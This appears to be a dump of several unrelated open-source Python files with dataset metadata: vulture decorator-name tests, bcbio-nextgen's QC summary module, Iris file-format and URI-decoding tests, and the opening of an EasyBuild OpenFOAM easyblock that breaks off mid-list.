["@xyz"]) def test_get_decorator_name_async(): code = """\ @foo.bar.route('/foobar') async def async_function(request): print(request) """ check_decorator_names(code, ["@foo.bar.route"]) def test_get_decorator_name_multiple_attrs(): code = """\ @x.y.z def doo(): pass """ check_decorator_names(code, ["@x.y.z"]) def test_get_decorator_name_multiple_attrs_called(): code = """\ @a.b.c.d.foo("Foo and Bar") def hoofoo(): pass """ check_decorator_names(code, ["@a.b.c.d.foo"]) def test_get_decorator_name_multiple_decorators(): code = """\ @foo @bar() @x.y.z.a('foobar') def func(): pass """ check_decorator_names(code, ["@foo", "@bar", "@x.y.z.a"]) def test_get_decorator_name_class(): code = """\ @foo @bar.yz class Foo: pass """ check_decorator_names(code, ["@foo", "@bar.yz"])
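# ---------------------------------------------------------------------------
# Editorial example (not part of the original test module): it shows
# utils.get_decorator_name() used directly on a parsed decorator node, which
# is exactly what the check_decorator_names() helper above does internally.
# ---------------------------------------------------------------------------
def example_get_decorator_name():
    tree = ast.parse("@app.route('/ping')\ndef ping():\n    pass\n")
    func_def = tree.body[0]
    # Each entry in decorator_list is an ast.Name, ast.Attribute, or ast.Call.
    return [utils.get_decorator_name(d) for d in func_def.decorator_list]


def test_example_get_decorator_name():
    assert example_get_decorator_name() == ["@app.route"]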
jendrikseipp/vulture
tests/test_utils.py
Python
mit
2,812
[ "VisIt" ]
40cba9d51bd2e35c1dfe79a0586bc276ca17aaa4f4817e2ec4bd3198dfc7d0f1
"""Quality control and summary metrics for next-gen alignments and analysis. """ import collections import copy import csv import os import yaml from datetime import datetime import pandas as pd import glob import toolz as tz from bcbio import bam from bcbio import utils from bcbio.cwl import cwlutils from bcbio.log import logger from bcbio.pipeline import config_utils, run_info import bcbio.pipeline.datadict as dd from bcbio.provenance import do from bcbio.rnaseq import gtf from bcbio.variation import damage, peddy, vcfutils, vcfanno import six # ## High level functions to generate summary def qc_to_rec(samples): """CWL: Convert a set of input samples into records for parallelization. """ samples = [utils.to_single_data(x) for x in samples] samples = cwlutils.assign_complex_to_samples(samples) to_analyze, extras = _split_samples_by_qc(samples) recs = cwlutils.samples_to_records([utils.to_single_data(x) for x in to_analyze + extras]) return [[x] for x in recs] def generate_parallel(samples, run_parallel): """Provide parallel preparation of summary information for alignment and variant calling. """ to_analyze, extras = _split_samples_by_qc(samples) qced = run_parallel("pipeline_summary", to_analyze) samples = _combine_qc_samples(qced) + extras qsign_info = run_parallel("qsignature_summary", [samples]) metadata_file = _merge_metadata([samples]) summary_file = write_project_summary(samples, qsign_info) out = [] for data in samples: if "summary" not in data[0]: data[0]["summary"] = {} data[0]["summary"]["project"] = summary_file data[0]["summary"]["metadata"] = metadata_file if qsign_info: data[0]["summary"]["mixup_check"] = qsign_info[0]["out_dir"] out.append(data) out = _add_researcher_summary(out, summary_file) # MultiQC must be run after all file outputs are set: return [[utils.to_single_data(d)] for d in run_parallel("multiqc_summary", [out])] def pipeline_summary(data): """Provide summary information on processing sample. Handles standard and CWL (single QC output) cases. """ data = utils.to_single_data(data) if data["analysis"].startswith("wgbs-seq"): bismark_bam = dd.get_align_bam(data) sorted_bam = bam.sort(bismark_bam, data["config"]) data = dd.set_align_bam(data, sorted_bam) data = dd.set_work_bam(data, bismark_bam) work_bam = dd.get_align_bam(data) or dd.get_work_bam(data) if not work_bam or not work_bam.endswith(".bam"): work_bam = None if dd.get_ref_file(data): if work_bam or (tz.get_in(["config", "algorithm", "kraken"], data)): # kraken doesn't need bam logger.info("QC: %s %s" % (dd.get_sample_name(data), ", ".join(dd.get_algorithm_qc(data)))) work_data = cwlutils.unpack_tarballs(utils.deepish_copy(data), data) data["summary"] = _run_qc_tools(work_bam, work_data) if (len(dd.get_algorithm_qc(data)) == 1 and "output_cwl_keys" in data): data["summary"]["qc"] = data["summary"]["qc"].get(dd.get_algorithm_qc(data)[0]) return [[data]] def get_qc_tools(data): """Retrieve a list of QC tools to use based on configuration and analysis type. Uses defaults if previously set. 
""" if dd.get_algorithm_qc(data): return dd.get_algorithm_qc(data) analysis = data["analysis"].lower() to_run = [] if tz.get_in(["config", "algorithm", "kraken"], data): to_run.append("kraken") if "fastqc" not in dd.get_tools_off(data): to_run.append("fastqc") if any([tool in dd.get_tools_on(data) for tool in ["qualimap", "qualimap_full"]]): to_run.append("qualimap") if analysis.startswith("rna-seq") or analysis == "smallrna-seq": if "qualimap" not in dd.get_tools_off(data): if gtf.is_qualimap_compatible(dd.get_gtf_file(data)): to_run.append("qualimap_rnaseq") else: logger.debug("GTF not compatible with Qualimap, skipping.") if analysis.startswith("chip-seq"): to_run.append("chipqc") if dd.get_chip_method(data) == "atac": to_run.append("ataqv") if analysis.startswith("smallrna-seq"): to_run.append("small-rna") to_run.append("atropos") if "coverage_qc" not in dd.get_tools_off(data): to_run.append("samtools") if dd.has_variantcalls(data): if "coverage_qc" not in dd.get_tools_off(data): to_run += ["coverage", "picard"] to_run += ["qsignature", "variants"] if vcfanno.is_human(data): to_run += ["peddy"] if "contamination" not in dd.get_tools_off(data): to_run += ["contamination"] if vcfutils.get_paired_phenotype(data): if "viral" not in dd.get_tools_off(data): to_run += ["viral"] if damage.should_filter([data]): to_run += ["damage"] if dd.get_umi_consensus(data): to_run += ["umi"] if tz.get_in(["config", "algorithm", "preseq"], data): to_run.append("preseq") to_run = [tool for tool in to_run if tool not in dd.get_tools_off(data)] to_run.sort() return to_run def _run_qc_tools(bam_file, data): """Run a set of third party quality control tools, returning QC directory and metrics. :param bam_file: alignments in bam format :param data: dict with all configuration information :returns: dict with output of different tools """ from bcbio.qc import (atropos, contamination, coverage, damage, fastqc, kraken, qsignature, qualimap, samtools, picard, srna, umi, variant, viral, preseq, chipseq, atac) tools = {"fastqc": fastqc.run, "atropos": atropos.run, "small-rna": srna.run, "samtools": samtools.run, "qualimap": qualimap.run, "qualimap_rnaseq": qualimap.run_rnaseq, "qsignature": qsignature.run, "contamination": contamination.run, "coverage": coverage.run, "damage": damage.run, "variants": variant.run, "peddy": peddy.run_qc, "kraken": kraken.run, "picard": picard.run, "umi": umi.run, "viral": viral.run, "preseq": preseq.run, "chipqc": chipseq.run, "ataqv": atac.run } qc_dir = utils.safe_makedir(os.path.join(data["dirs"]["work"], "qc", data["description"])) metrics = {} qc_out = utils.deepish_copy(dd.get_summary_qc(data)) for program_name in dd.get_algorithm_qc(data): if not bam_file and program_name != "kraken": # kraken doesn't need bam continue if dd.get_phenotype(data) == "germline" and program_name != "variants": continue qc_fn = tools[program_name] cur_qc_dir = os.path.join(qc_dir, program_name) out = qc_fn(bam_file, data, cur_qc_dir) qc_files = None if out and isinstance(out, dict): # Check for metrics output, two cases: # 1. output with {"metrics"} and files ("base") if "metrics" in out: metrics.update(out.pop("metrics")) # 2. 
a dictionary of metrics elif "base" not in out: metrics.update(out) # Check for files only output if "base" in out: qc_files = out elif out and isinstance(out, six.string_types) and os.path.exists(out): qc_files = {"base": out, "secondary": []} if not qc_files: qc_files = _organize_qc_files(program_name, cur_qc_dir) if qc_files: qc_out[program_name] = qc_files metrics["Name"] = dd.get_sample_name(data) metrics["Quality format"] = dd.get_quality_format(data).lower() return {"qc": qc_out, "metrics": metrics} def _organize_qc_files(program, qc_dir): """Organize outputs from quality control runs into a base file and secondary outputs. Provides compatibility with CWL output. Returns None if no files created during processing. """ base_files = {"fastqc": "fastqc_report.html", "qualimap_rnaseq": "qualimapReport.html", "qualimap": "qualimapReport.html"} if os.path.exists(qc_dir): out_files = [] for fname in [os.path.join(qc_dir, x) for x in os.listdir(qc_dir)]: if os.path.isfile(fname) and not fname.endswith(".bcbiotmp"): out_files.append(fname) elif os.path.isdir(fname) and not fname.endswith("tx"): for root, dirs, files in os.walk(fname): for f in files: if not f.endswith(".bcbiotmp"): out_files.append(os.path.join(root, f)) if len(out_files) > 0 and all([not f.endswith("-failed.log") for f in out_files]): if len(out_files) == 1: base = out_files[0] secondary = [] else: base = None if program in base_files: base_choices = [x for x in out_files if x.endswith("/%s" % base_files[program])] if len(base_choices) == 1: base = base_choices[0] if not base: base = out_files[0] secondary = [x for x in out_files if x != base] return {"base": base, "secondary": secondary} # ## Allow parallelization for separate QC runs def _split_samples_by_qc(samples): """Split data into individual quality control steps for a run. """ to_process = [] extras = [] for data in [utils.to_single_data(x) for x in samples]: qcs = dd.get_algorithm_qc(data) # kraken doesn't need bam if qcs and (dd.get_align_bam(data) or dd.get_work_bam(data) or tz.get_in(["config", "algorithm", "kraken"], data)): for qc in qcs: add = copy.deepcopy(data) add["config"]["algorithm"]["qc"] = [qc] to_process.append([add]) else: extras.append([data]) return to_process, extras def _combine_qc_samples(samples): """Combine split QC analyses into single samples based on BAM files. """ by_bam = collections.defaultdict(list) for data in [utils.to_single_data(x) for x in samples]: batch = dd.get_batch(data) or dd.get_sample_name(data) if not isinstance(batch, (list, tuple)): batch = [batch] batch = tuple(batch) by_bam[(dd.get_align_bam(data) or dd.get_work_bam(data), batch)].append(data) out = [] for data_group in by_bam.values(): data = data_group[0] alg_qc = [] qc = {} metrics = {} for d in data_group: qc.update(dd.get_summary_qc(d)) metrics.update(dd.get_summary_metrics(d)) alg_qc.extend(dd.get_algorithm_qc(d)) data["config"]["algorithm"]["qc"] = alg_qc data["summary"]["qc"] = qc data["summary"]["metrics"] = metrics out.append([data]) return out # ## Generate project level QC summary for quickly assessing large projects def write_project_summary(samples, qsign_info=None): """Write project summary information on the provided samples. 
write out dirs, genome resources, """ work_dir = samples[0][0]["dirs"]["work"] out_file = os.path.join(work_dir, "project-summary.yaml") upload_dir = (os.path.join(work_dir, samples[0][0]["upload"]["dir"]) if "dir" in samples[0][0]["upload"] else "") date = str(datetime.now()) prev_samples = _other_pipeline_samples(out_file, samples) with open(out_file, "w") as out_handle: yaml.safe_dump({"date": date}, out_handle, default_flow_style=False, allow_unicode=False) if qsign_info: qsign_out = utils.deepish_copy(qsign_info[0]) qsign_out.pop("out_dir", None) yaml.safe_dump({"qsignature": qsign_out}, out_handle, default_flow_style=False, allow_unicode=False) yaml.safe_dump({"upload": upload_dir}, out_handle, default_flow_style=False, allow_unicode=False) yaml.safe_dump({"bcbio_system": samples[0][0]["config"].get("bcbio_system", "")}, out_handle, default_flow_style=False, allow_unicode=False) yaml.safe_dump({"samples": prev_samples + [_save_fields(sample[0]) for sample in samples]}, out_handle, default_flow_style=False, allow_unicode=False) return out_file def _merge_metadata(samples): """Merge all metadata into CSV file""" samples = list(utils.flatten(samples)) out_dir = dd.get_work_dir(samples[0]) logger.info("summarize metadata") out_file = os.path.join(out_dir, "metadata.csv") sample_metrics = collections.defaultdict(dict) for s in samples: m = tz.get_in(['metadata'], s) if isinstance(m, six.string_types): m = json.loads(m) if m: for me in list(m.keys()): if isinstance(m[me], list) or isinstance(m[me], dict) or isinstance(m[me], tuple): m.pop(me, None) sample_metrics[dd.get_sample_name(s)].update(m) pd.DataFrame(sample_metrics).transpose().to_csv(out_file) return out_file def _other_pipeline_samples(summary_file, cur_samples): """Retrieve samples produced previously by another pipeline in the summary output. """ cur_descriptions = set([s[0]["description"] for s in cur_samples]) out = [] if utils.file_exists(summary_file): with open(summary_file) as in_handle: for s in yaml.safe_load(in_handle).get("samples", []): if s["description"] not in cur_descriptions: out.append(s) return out def _save_fields(sample): to_save = ["dirs", "genome_resources", "genome_build", "sam_ref", "metadata", "description"] saved = {k: sample[k] for k in to_save if k in sample} if "summary" in sample and "metrics" in sample["summary"]: saved["summary"] = {"metrics": sample["summary"]["metrics"]} return saved # ## Generate researcher specific summaries def _add_researcher_summary(samples, summary_yaml): """Generate summary files per researcher if organized via a LIMS. """ by_researcher = collections.defaultdict(list) for data in (x[0] for x in samples): researcher = utils.get_in(data, ("upload", "researcher")) if researcher: by_researcher[researcher].append(data["description"]) out_by_researcher = {} for researcher, descrs in by_researcher.items(): out_by_researcher[researcher] = _summary_csv_by_researcher(summary_yaml, researcher, set(descrs), samples[0][0]) out = [] for data in (x[0] for x in samples): researcher = utils.get_in(data, ("upload", "researcher")) if researcher: data["summary"]["researcher"] = out_by_researcher[researcher] out.append([data]) return out def _summary_csv_by_researcher(summary_yaml, researcher, descrs, data): """Generate a CSV file with summary information for a researcher on this project. 
""" out_file = os.path.join(utils.safe_makedir(os.path.join(data["dirs"]["work"], "researcher")), "%s-summary.tsv" % run_info.clean_name(researcher)) metrics = ["Total_reads", "Mapped_reads", "Mapped_reads_pct", "Duplicates", "Duplicates_pct"] with open(summary_yaml) as in_handle: with open(out_file, "w") as out_handle: writer = csv.writer(out_handle, dialect="excel-tab") writer.writerow(["Name"] + metrics) for sample in yaml.safe_load(in_handle)["samples"]: if sample["description"] in descrs: row = [sample["description"]] + [utils.get_in(sample, ("summary", "metrics", x), "") for x in metrics] writer.writerow(row) return out_file # ## Galaxy functionality def prep_pdf(qc_dir, config): """Create PDF from HTML summary outputs in QC directory. Requires wkhtmltopdf installed: http://www.msweet.org/projects.php?Z1 Thanks to: https://www.biostars.org/p/16991/ Works around issues with CSS conversion on CentOS by adjusting CSS. """ html_file = os.path.join(qc_dir, "fastqc", "fastqc_report.html") html_fixed = "%s-fixed%s" % os.path.splitext(html_file) try: topdf = config_utils.get_program("wkhtmltopdf", config) except config_utils.CmdNotFound: topdf = None if topdf and utils.file_exists(html_file): out_file = "%s.pdf" % os.path.splitext(html_file)[0] if not utils.file_exists(out_file): cmd = ("sed 's/div.summary/div.summary-no/' %s | sed 's/div.main/div.main-no/' > %s" % (html_file, html_fixed)) do.run(cmd, "Fix fastqc CSS to be compatible with wkhtmltopdf") cmd = [topdf, html_fixed, out_file] do.run(cmd, "Convert QC HTML to PDF") return out_file
lbeltrame/bcbio-nextgen
bcbio/pipeline/qcsummary.py
Python
mit
17,471
[ "Galaxy" ]
ec974f5b9105a0bb834264f2210837ef8955ee76fdee6b36eeead3ef1b5ee70f
# (C) British Crown Copyright 2010 - 2015, Met Office
#
# This file is part of Iris.
#
# Iris is free software: you can redistribute it and/or modify it under
# the terms of the GNU Lesser General Public License as published by the
# Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Iris is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Iris. If not, see <http://www.gnu.org/licenses/>.
"""
Test the io/__init__.py module.

"""

from __future__ import (absolute_import, division, print_function)
from six.moves import (filter, input, map, range, zip)  # noqa

# import iris tests first so that some things can be initialised before importing anything else
import iris.tests as tests

import unittest
from io import BytesIO

import iris.fileformats as iff
import iris.io


class TestDecodeUri(unittest.TestCase):
    def test_decode_uri(self):
        tests = {
            '/data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp': (
                'file', '/data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp'
            ),
            r'C:\data\local\someDir\PP\COLPEX\COLPEX_16a_pj001.pp': (
                'file', r'C:\data\local\someDir\PP\COLPEX\COLPEX_16a_pj001.pp'
            ),
            'file:///data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp': (
                'file', '///data/local/someDir/PP/COLPEX/COLPEX_16a_pj001.pp'
            ),
            'http://www.somehost.com:8080/resource/thing.grib': (
                'http', '//www.somehost.com:8080/resource/thing.grib'
            ),
            '/data/local/someDir/2013-11-25T13:49:17.632797': (
                'file', '/data/local/someDir/2013-11-25T13:49:17.632797'
            ),
        }

        for uri, pair in tests.items():
            self.assertEqual(pair, iris.io.decode_uri(uri))


class TestFileFormatPicker(tests.IrisTest):
    def test_known_formats(self):
        self.assertString(str(iff.FORMAT_AGENT),
                          tests.get_result_path(('file_load',
                                                 'known_loaders.txt')))

    @tests.skip_data
    def test_format_picker(self):
        # ways to test the format picker = list of (format-name, file-spec)
        test_specs = [
            ('NetCDF',
             ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc']),
            ('NetCDF 64 bit offset format',
             ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc.k2']),
            ('NetCDF_v4',
             ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc4.k3']),
            ('NetCDF_v4',
             ['NetCDF', 'global', 'xyt', 'SMALL_total_column_co2.nc4.k4']),
            ('UM Fieldsfile (FF) post v5.2',
             ['FF', 'n48_multi_field']),
            ('GRIB',
             ['GRIB', 'grib1_second_order_packing', 'GRIB_00008_FRANX01']),
            ('GRIB',
             ['GRIB', 'jpeg2000', 'file.grib2']),
            ('UM Post Processing file (PP)',
             ['PP', 'simple_pp', 'global.pp']),
            ('UM Fieldsfile (FF) ancillary',
             ['FF', 'ancillary_fixed_length_header']),
            # ('BUFR',
            #  ['BUFR', 'mss', 'BUFR_Samples',
            #   'JUPV78_EGRR_121200_00002501']),
            ('NIMROD',
             ['NIMROD', 'uk2km', 'WO0000000003452',
              '201007020900_u1096_ng_ey00_visibility0180_screen_2km']),
            # ('NAME',
            #  ['NAME', '20100509_18Z_variablesource_12Z_VAAC',
            #   'Fields_grid1_201005110000.txt']),
        ]

        # test that each filespec is identified as the expected format
        for (expected_format_name, file_spec) in test_specs:
            test_path = tests.get_data_path(file_spec)
            with open(test_path, 'rb') as test_file:
                a = iff.FORMAT_AGENT.get_spec(test_path, test_file)
                self.assertEqual(a.name, expected_format_name)

    def test_format_picker_nodata(self):
        # The following is to replace the above at some point as no real files
        # are required.
# (Used binascii.unhexlify() to convert from hex to binary) # Packaged grib, magic number offset by set length, this length is # specific to WMO bulletin headers header_lengths = [21, 80, 41, 42] for header_length in header_lengths: binary_string = header_length * b'\x00' + b'GRIB' + b'\x00' * 100 with BytesIO(b'rw') as bh: bh.write(binary_string) bh.name = 'fake_file_handle' a = iff.FORMAT_AGENT.get_spec(bh.name, bh) self.assertEqual(a.name, 'GRIB') def test_open_dap(self): # tests that *ANY* http or https URL is seen as an OPeNDAP service. # This may need to change in the future if other protocols are # supported. DAP_URI = 'http://geoport.whoi.edu/thredds/dodsC/bathy/gom15' a = iff.FORMAT_AGENT.get_spec(DAP_URI, None) self.assertEqual(a.name, 'NetCDF OPeNDAP') @tests.skip_data class TestFileExceptions(tests.IrisTest): def test_pp_little_endian(self): filename = tests.get_data_path(('PP', 'aPPglob1', 'global_little_endian.pp')) self.assertRaises(ValueError, iris.load_cube, filename) if __name__ == '__main__': tests.main()
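# ---------------------------------------------------------------------------
# Editorial example (not part of the original test module): it shows the
# (scheme, part) pairs that iris.io.decode_uri() produces for the two URI
# forms exercised by TestDecodeUri above, with made-up illustrative paths.
# ---------------------------------------------------------------------------
def _example_decode_uri():
    # A plain filesystem path decodes with an implicit 'file' scheme ...
    assert iris.io.decode_uri('/tmp/air_temp.pp') == ('file', '/tmp/air_temp.pp')
    # ... while an explicit scheme is split off at its trailing ':'.
    assert iris.io.decode_uri('http://host/thing.grib') == ('http', '//host/thing.grib')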
ghislainp/iris
lib/iris/tests/test_io_init.py
Python
gpl-3.0
5,591
[ "NetCDF" ]
6d393c40c89bb47eb46330e51a47cdeee582cf933658473694329ba668dc84aa
""" Class for outlier detection. This class provides a framework for outlier detection. It consists in several methods that can be added to a covariance estimator in order to assess the outlying-ness of the observations of a data set. Such a "outlier detector" object is proposed constructed from a robust covariance estimator (the Minimum Covariance Determinant). """ # Author: Virgile Fritsch <virgile.fritsch@inria.fr> # # License: BSD 3 clause import warnings import numpy as np import scipy as sp from . import MinCovDet from ..base import ClassifierMixin from ..utils.validation import check_is_fitted class OutlierDetectionMixin(object): """Set of methods for outliers detection with covariance estimators. Parameters ---------- contamination : float, 0. < contamination < 0.5 The amount of contamination of the data set, i.e. the proportion of outliers in the data set. Notes ----- Outlier detection from covariance estimation may break or not perform well in high-dimensional settings. In particular, one will always take care to work with ``n_samples > n_features ** 2``. """ def __init__(self, contamination=0.1): self.contamination = contamination def decision_function(self, X, raw_values=False): """Compute the decision function of the given observations. Parameters ---------- X : array-like, shape (n_samples, n_features) raw_values : bool Whether or not to consider raw Mahalanobis distances as the decision function. Must be False (default) for compatibility with the others outlier detection tools. Returns ------- decision : array-like, shape (n_samples, ) The values of the decision function for each observations. It is equal to the Mahalanobis distances if `raw_values` is True. By default (``raw_values=True``), it is equal to the cubic root of the shifted Mahalanobis distances. In that case, the threshold for being an outlier is 0, which ensures a compatibility with other outlier detection tools such as the One-Class SVM. """ check_is_fitted(self, 'threshold_') mahal_dist = self.mahalanobis(X) if raw_values: decision = mahal_dist else: check_is_fitted(self, 'threshold_') transformed_mahal_dist = mahal_dist ** 0.33 decision = self.threshold_ ** 0.33 - transformed_mahal_dist return decision def predict(self, X): """Outlyingness of observations in X according to the fitted model. Parameters ---------- X : array-like, shape = (n_samples, n_features) Returns ------- is_outliers : array, shape = (n_samples, ), dtype = bool For each observations, tells whether or not it should be considered as an outlier according to the fitted model. threshold : float, The values of the less outlying point's decision function. """ check_is_fitted(self, 'threshold_') is_inlier = -np.ones(X.shape[0], dtype=int) if self.contamination is not None: values = self.decision_function(X, raw_values=True) is_inlier[values <= self.threshold_] = 1 else: raise NotImplementedError("You must provide a contamination rate.") return is_inlier @property def threshold(self): warnings.warn(("The threshold attribute is renamed to threshold_ from " "0.16 onwards and will be removed in 0.18"), DeprecationWarning, stacklevel=1) return getattr(self, 'threshold_', None) class EllipticEnvelope(ClassifierMixin, OutlierDetectionMixin, MinCovDet): """An object for detecting outliers in a Gaussian distributed dataset. Attributes ---------- `contamination` : float, 0. < contamination < 0.5 The amount of contamination of the data set, i.e. the proportion of \ outliers in the data set. 
location_ : array-like, shape (n_features,) Estimated robust location covariance_ : array-like, shape (n_features, n_features) Estimated robust covariance matrix precision_ : array-like, shape (n_features, n_features) Estimated pseudo inverse matrix. (stored only if store_precision is True) support_ : array-like, shape (n_samples,) A mask of the observations that have been used to compute the robust estimates of location and shape. Parameters ---------- store_precision : bool Specify if the estimated precision is stored. assume_centered : Boolean If True, the support of robust location and covariance estimates is computed, and a covariance estimate is recomputed from it, without centering the data. Useful to work with data whose mean is significantly equal to zero but is not exactly zero. If False, the robust location and covariance are directly computed with the FastMCD algorithm without additional treatment. support_fraction : float, 0 < support_fraction < 1 The proportion of points to be included in the support of the raw MCD estimate. Default is ``None``, which implies that the minimum value of support_fraction will be used within the algorithm: `[n_sample + n_features + 1] / 2`. contamination : float, 0. < contamination < 0.5 The amount of contamination of the data set, i.e. the proportion of outliers in the data set. See Also -------- EmpiricalCovariance, MinCovDet Notes ----- Outlier detection from covariance estimation may break or not perform well in high-dimensional settings. In particular, one will always take care to work with ``n_samples > n_features ** 2``. References ---------- .. [1] Rousseeuw, P.J., Van Driessen, K. "A fast algorithm for the minimum covariance determinant estimator" Technometrics 41(3), 212 (1999) """ def __init__(self, store_precision=True, assume_centered=False, support_fraction=None, contamination=0.1, random_state=None): MinCovDet.__init__(self, store_precision=store_precision, assume_centered=assume_centered, support_fraction=support_fraction, random_state=random_state) OutlierDetectionMixin.__init__(self, contamination=contamination) def fit(self, X, y=None): MinCovDet.fit(self, X) self.threshold_ = sp.stats.scoreatpercentile( self.dist_, 100. * (1. - self.contamination)) return self
shikhardb/scikit-learn
sklearn/covariance/outlier_detection.py
Python
bsd-3-clause
6,856
[ "Gaussian" ]
63f02484b5c19293512c35e0d988a822d8a5bef8bbb24b8cb2dfb5586a03ecca
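A minimal usage sketch for the EllipticEnvelope estimator recorded above, assuming a scikit-learn version from the same era (0.15/0.16); the synthetic Gaussian data and the 2% contamination rate are illustrative choices, not part of the original file:

import numpy as np
from sklearn.covariance import EllipticEnvelope

rng = np.random.RandomState(0)
X = rng.randn(500, 2)       # inliers drawn from a standard Gaussian
X[:10] += 6.0               # shift a few points to act as outliers

clf = EllipticEnvelope(contamination=0.02)
clf.fit(X)
labels = clf.predict(X)             # +1 for inliers, -1 for outliers
scores = clf.decision_function(X)   # > 0 inside the envelope, < 0 outside
print("flagged outliers:", int((labels == -1).sum()))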
##
# Copyright 2009-2015 Ghent University
#
# This file is part of EasyBuild,
# originally created by the HPC team of Ghent University (http://ugent.be/hpc/en),
# with support of Ghent University (http://ugent.be/hpc),
# the Flemish Supercomputer Centre (VSC) (https://vscentrum.be/nl/en),
# the Hercules foundation (http://www.herculesstichting.be/in_English)
# and the Department of Economy, Science and Innovation (EWI) (http://www.ewi-vlaanderen.be/en).
#
# http://github.com/hpcugent/easybuild
#
# EasyBuild is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation v2.
#
# EasyBuild is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with EasyBuild.  If not, see <http://www.gnu.org/licenses/>.
##
"""
EasyBuild support for building and installing OpenFOAM, implemented as an easyblock

@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
@author: Xavier Besseron (University of Luxembourg)
"""

import os
import shutil
import stat
from distutils.version import LooseVersion

import easybuild.tools.environment as env
import easybuild.tools.toolchain as toolchain
from easybuild.framework.easyblock import EasyBlock
from easybuild.tools.build_log import EasyBuildError
from easybuild.tools.filetools import adjust_permissions, mkdir
from easybuild.tools.modules import get_software_root
from easybuild.tools.run import run_cmd, run_cmd_qa


class EB_OpenFOAM(EasyBlock):
    """Support for building and installing OpenFOAM."""

    def __init__(self, *args, **kwargs):
        """Specify that OpenFOAM should be built in install dir."""
        super(EB_OpenFOAM, self).__init__(*args, **kwargs)

        self.build_in_installdir = True

        self.wm_compiler = None
        self.wm_mplib = None

        self.openfoamdir = None
        self.thrdpartydir = None

        if 'extend' in self.name.lower():
            if LooseVersion(self.version) >= LooseVersion('3.0'):
                self.openfoamdir = 'foam-extend-%s' % self.version
            else:
                self.openfoamdir = 'OpenFOAM-%s-ext' % self.version
        else:
            self.openfoamdir = '-'.join([self.name, '-'.join(self.version.split('-')[:2])])
        self.log.debug("openfoamdir: %s" % self.openfoamdir)

    def extract_step(self):
        """Extract sources as expected by the OpenFOAM(-Extend) build scripts."""
        super(EB_OpenFOAM, self).extract_step()
        # make sure that the expected subdir is really there after extracting
        # if not, the build scripts (e.g., the etc/bashrc being sourced) will likely fail
        openfoam_installdir = os.path.join(self.installdir, self.openfoamdir)
        if not os.path.exists(openfoam_installdir):
            self.log.warning("Creating expected directory %s, and moving everything there" % openfoam_installdir)
            try:
                mkdir(openfoam_installdir)
                for fil in os.listdir(self.installdir):
                    if fil != self.openfoamdir:
                        source = os.path.join(self.installdir, fil)
                        target = os.path.join(openfoam_installdir, fil)
                        self.log.debug("Moving %s to %s" % (source, target))
                        shutil.move(source, target)
                os.chdir(openfoam_installdir)
            except OSError, err:
                raise EasyBuildError("Failed to move all files to %s: %s", openfoam_installdir, err)

    def configure_step(self):
        """Configure OpenFOAM build by setting appropriate environment variables."""
        # enable verbose build for debug purposes
        env.setvar("FOAM_VERBOSE", "1")

        # installation directory
        env.setvar("FOAM_INST_DIR", self.installdir)

        # third party directory
        self.thrdpartydir = "ThirdParty-%s" % self.version
        # only if third party stuff is actually installed
        if os.path.exists(self.thrdpartydir):
            os.symlink(os.path.join("..", self.thrdpartydir), self.thrdpartydir)
            env.setvar("WM_THIRD_PARTY_DIR", os.path.join(self.installdir, self.thrdpartydir))

        # compiler
        comp_fam = self.toolchain.comp_family()

        if comp_fam == toolchain.GCC:  #@UndefinedVariable
            self.wm_compiler = "Gcc"
        elif comp_fam == toolchain.INTELCOMP:  #@UndefinedVariable
            self.wm_compiler = "Icc"
            # make sure -no-prec-div is used with Intel compilers
            self.cfg.update('prebuildopts', 'CFLAGS="$CFLAGS -no-prec-div" CXXFLAGS="$CXXFLAGS -no-prec-div"')
        else:
            raise EasyBuildError("Unknown compiler family, don't know how to set WM_COMPILER")
        env.setvar("WM_COMPILER", self.wm_compiler)

        # set to an MPI unknown by OpenFOAM, since we're handling the MPI settings ourselves (via mpicc, etc.)
        # Note: this name must contain 'MPI' so the MPI version of the Pstream library is built (cf src/Pstream/Allwmake)
        self.wm_mplib = "EASYBUILDMPI"
        env.setvar("WM_MPLIB", self.wm_mplib)

        # parallel build spec
        env.setvar("WM_NCOMPPROCS", str(self.cfg['parallel']))

        # make sure lib/include dirs for dependencies are found
        openfoam_extend_v3 = 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion('3.0')
        if LooseVersion(self.version) < LooseVersion("2") or openfoam_extend_v3:
            self.log.debug("List of deps: %s" % self.cfg.dependencies())
            for dep in self.cfg.dependencies():
                self.cfg.update('prebuildopts', "%s_SYSTEM=1" % dep['name'].upper())
                self.cfg.update('prebuildopts', "%(name)s_LIB_DIR=$EBROOT%(name)s/lib" % {'name': dep['name'].upper()})
                self.cfg.update('prebuildopts', "%(name)s_INCLUDE_DIR=$EBROOT%(name)s/include" % {'name': dep['name'].upper()})
        else:
            scotch = get_software_root('SCOTCH')
            if scotch:
                self.cfg.update('prebuildopts', "SCOTCH_ROOT=$EBROOTSCOTCH")

    def build_step(self):
        """Build OpenFOAM using make after sourcing script to set environment."""
        precmd = "source %s" % os.path.join(self.builddir, self.openfoamdir, "etc", "bashrc")

        # make directly in install directory
        cmd_tmpl = "%(precmd)s && %(prebuildopts)s %(makecmd)s" % {
            'precmd': precmd,
            'prebuildopts': self.cfg['prebuildopts'],
            'makecmd': os.path.join(self.builddir, self.openfoamdir, '%s'),
        }
        if 'extend' in self.name.lower() and LooseVersion(self.version) >= LooseVersion('3.0'):
            qa = {
                "Proceed without compiling ParaView [Y/n]": 'Y',
                "Proceed without compiling cudaSolvers? [Y/n]": 'Y',
            }
            noqa = [
                ".* -o .*",
